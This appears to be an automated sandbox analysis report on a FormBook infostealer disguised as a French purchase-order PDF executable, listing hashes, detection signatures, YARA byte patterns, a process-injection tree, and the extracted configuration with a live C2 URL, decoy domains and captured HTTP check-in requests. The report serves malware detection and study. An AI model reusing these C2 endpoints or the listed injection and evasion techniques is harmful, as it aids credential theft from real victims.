Loading ...

Play interactive tourEdit tour

Windows Analysis Report Nouveau bon de commande. 3007021_pdf.exe

Overview

General Information

Sample Name:Nouveau bon de commande. 3007021_pdf.exe
Analysis ID:458861
MD5:e1d1316d5bc047ec817b950286734ed0
SHA1:ae3cb4a0103f8daa9ec8f6dc00b6bfeb3f1c52ca
SHA256:6fd8c63bf53f7364e54505eb98e1b6fc005fbb691a65680e400e7b9104ad1795
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Nouveau bon de commande. 3007021_pdf.exe (PID: 3704 cmdline: 'C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe' MD5: E1D1316D5BC047EC817B950286734ED0)
    • Nouveau bon de commande. 3007021_pdf.exe (PID: 5028 cmdline: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe MD5: E1D1316D5BC047EC817B950286734ED0)
      • explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • WWAHost.exe (PID: 1380 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
          • cmd.exe (PID: 4120 cmdline: /c del 'C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.trucktodock.com/ajs8/"], "decoy": ["lotfysupport.net", "tradingsentral.com", "mobiles240.com", "redecompre.com", "mulliganjames.com", "excursionlanzarote.com", "n1getaccess.com", "wirelessconsole.com", "thevez.net", "joygshpng.com", "arandawines.com", "eliassantis.net", "racevc.com", "mybluemonitor.com", "jual-penggugurkandungan.com", "connectgf.com", "nmpsolutions.com", "anipawesome.com", "vissito.com", "terracottagkp.com", "oemintra.com", "greensecuredeeparchive.com", "zhaoba17.com", "indiadesignstory.com", "handybusy.com", "fkldklfdklfddef.com", "winnadvisorsolutions.com", "signin-solution.com", "comericac.com", "tugqzcc.icu", "discountpty.com", "dhclanrs.com", "tetasdeoro.com", "qroyalrealestate.com", "beweirdbrand.com", "veganonthegreens.info", "paulsplumbingllc.com", "ontimedigitalagency.com", "meohaysucsong.club", "commandherofyou.com", "travelawardsguide.com", "shopvybz.com", "healthylivingawaits.com", "theassistedadrscheme.com", "iphonescreenprotect.com", "zhuqiuhui.space", "514rosemont.com", "labour-exchange.com", "sarahhubrealestate.com", "kcleases.com", "kupitoptom.com", "drayasvista.com", "esmo-2017.com", "jubmoprivacy.com", "heymayafilms.com", "beregnung-mv.com", "relishliferesearchcenter.com", "cchidwick.xyz", "thederbyshiresoapcompany.com", "poconohomeinspectors.com", "gregorymazzalaw.com", "ofaplatinumbonus.com", "laurenbarclay.com", "sickandwireless.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166b9:$sqlite3step: 68 34 1C 7B E1
        • 0x167cc:$sqlite3step: 68 34 1C 7B E1
        • 0x166e8:$sqlite3text: 68 38 2A 90 C5
        • 0x1680d:$sqlite3text: 68 38 2A 90 C5
        • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
        2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.trucktodock.com/ajs8/"], "decoy": ["lotfysupport.net", "tradingsentral.com", "mobiles240.com", "redecompre.com", "mulliganjames.com", "excursionlanzarote.com", "n1getaccess.com", "wirelessconsole.com", "thevez.net", "joygshpng.com", "arandawines.com", "eliassantis.net", "racevc.com", "mybluemonitor.com", "jual-penggugurkandungan.com", "connectgf.com", "nmpsolutions.com", "anipawesome.com", "vissito.com", "terracottagkp.com", "oemintra.com", "greensecuredeeparchive.com", "zhaoba17.com", "indiadesignstory.com", "handybusy.com", "fkldklfdklfddef.com", "winnadvisorsolutions.com", "signin-solution.com", "comericac.com", "tugqzcc.icu", "discountpty.com", "dhclanrs.com", "tetasdeoro.com", "qroyalrealestate.com", "beweirdbrand.com", "veganonthegreens.info", "paulsplumbingllc.com", "ontimedigitalagency.com", "meohaysucsong.club", "commandherofyou.com", "travelawardsguide.com", "shopvybz.com", "healthylivingawaits.com", "theassistedadrscheme.com", "iphonescreenprotect.com", "zhuqiuhui.space", "514rosemont.com", "labour-exchange.com", "sarahhubrealestate.com", "kcleases.com", "kupitoptom.com", "drayasvista.com", "esmo-2017.com", "jubmoprivacy.com", "heymayafilms.com", "beregnung-mv.com", "relishliferesearchcenter.com", "cchidwick.xyz", "thederbyshiresoapcompany.com", "poconohomeinspectors.com", "gregorymazzalaw.com", "ofaplatinumbonus.com", "laurenbarclay.com", "sickandwireless.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Nouveau bon de commande. 3007021_pdf.exeVirustotal: Detection: 60%Perma Link
          Source: Nouveau bon de commande. 3007021_pdf.exeMetadefender: Detection: 34%Perma Link
          Source: Nouveau bon de commande. 3007021_pdf.exeReversingLabs: Detection: 82%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: Nouveau bon de commande. 3007021_pdf.exeJoe Sandbox ML: detected
          Source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Nouveau bon de commande. 3007021_pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Nouveau bon de commande. 3007021_pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: WWAHost.pdb source: Nouveau bon de commande. 3007021_pdf.exe, 00000002.00000002.293934813.0000000001E20000.00000040.00000001.sdmp
          Source: Binary string: WWAHost.pdbUGP source: Nouveau bon de commande. 3007021_pdf.exe, 00000002.00000002.293934813.0000000001E20000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Nouveau bon de commande. 3007021_pdf.exe, 00000002.00000002.292665175.0000000001AC0000.00000040.00000001.sdmp, WWAHost.exe, 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Nouveau bon de commande. 3007021_pdf.exe, 00000002.00000002.292665175.0000000001AC0000.00000040.00000001.sdmp, WWAHost.exe
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 23.227.38.74:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.trucktodock.com/ajs8/
          Source: global trafficHTTP traffic detected: GET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=xNYePOcIRg8tONHl062QEzR3pjdpSOb6qFMYs+u8dcNvqsBFMqM/aahx6CIdT83MIu1q HTTP/1.1Host: www.discountpty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ajs8/?3fBlVXm=hqPLwoezIU4RJkzOayN9OUqrFULw7U9SfOZePsq8F9HyGJJZCf9ZB5ZbUnjAkpqHeNor&q48d=HFQLptYpKX HTTP/1.1Host: www.shopvybz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=2BRIB0J+IU74eT9QrM34IgOLc6rvRxRggRQ5Dm44nGBTXrZyhrhiT7zmyDkAgt3Lv1f/ HTTP/1.1Host: www.handybusy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ajs8/?3fBlVXm=PXCQsRsj6f+UKLkz5iYmBV65DPKHBBScBAKRyWuZQRoQL6ffVXDgpay6Ct5U2sE+s5q9&q48d=HFQLptYpKX HTTP/1.1Host: www.theassistedadrscheme.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=LEjUMU+rw+m1MGLci6xLa4kNPPdUPj6aoKRsjeM/sCEy0PaNWwzv7jP2E4a8Zzb0ARTh HTTP/1.1Host: www.indiadesignstory.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=3clrjbd8Uk1yhLkd6I01KEeFnSa+FczhmxXwmvBnovucnEmM2e32CtS7ZjKvb0koSvtC HTTP/1.1Host: www.trucktodock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=xNYePOcIRg8tONHl062QEzR3pjdpSOb6qFMYs+u8dcNvqsBFMqM/aahx6CIdT83MIu1q HTTP/1.1Host: www.discountpty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ajs8/?3fBlVXm=hqPLwoezIU4RJkzOayN9OUqrFULw7U9SfOZePsq8F9HyGJJZCf9ZB5ZbUnjAkpqHeNor&q48d=HFQLptYpKX HTTP/1.1Host: www.shopvybz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=2BRIB0J+IU74eT9QrM34IgOLc6rvRxRggRQ5Dm44nGBTXrZyhrhiT7zmyDkAgt3Lv1f/ HTTP/1.1Host: www.handybusy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ajs8/?3fBlVXm=PXCQsRsj6f+UKLkz5iYmBV65DPKHBBScBAKRyWuZQRoQL6ffVXDgpay6Ct5U2sE+s5q9&q48d=HFQLptYpKX HTTP/1.1Host: www.theassistedadrscheme.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=LEjUMU+rw+m1MGLci6xLa4kNPPdUPj6aoKRsjeM/sCEy0PaNWwzv7jP2E4a8Zzb0ARTh HTTP/1.1Host: www.indiadesignstory.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=3clrjbd8Uk1yhLkd6I01KEeFnSa+FczhmxXwmvBnovucnEmM2e32CtS7ZjKvb0koSvtC HTTP/1.1Host: www.trucktodock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.jual-penggugurkandungan.com
          Source: explorer.exe, 00000003.00000000.263962235.000000000F6C4000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: WWAHost.exe, 0000000A.00000002.477885883.0000000003D32000.00000004.00000001.sdmpString found in binary or memory: http://travelawardsguide.com/ajs8/?3fBlVXm=SVfnn/RS59BZjQOJq1nGaV1j1LxsdmH7K5f9UuJUxaq5YOiipJWffLZbL
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Nouveau bon de commande. 3007021_pdf.exe, 00000000.00000003.206509028.0000000000FAD000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnN
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: WWAHost.exe, 0000000A.00000002.477885883.0000000003D32000.00000004.00000001.sdmpString found in binary or memory: https://www.indiadesignstory.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=LEjUMU

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Nouveau bon de commande. 3007021_pdf.exe
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_0041817B NtCreateFile,
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_004181BA NtCreateFile,
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_0041826B NtReadFile,
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_004182EA NtClose,
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_0041839C NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03659A50 NtCreateFile,LdrInitializeThunk,
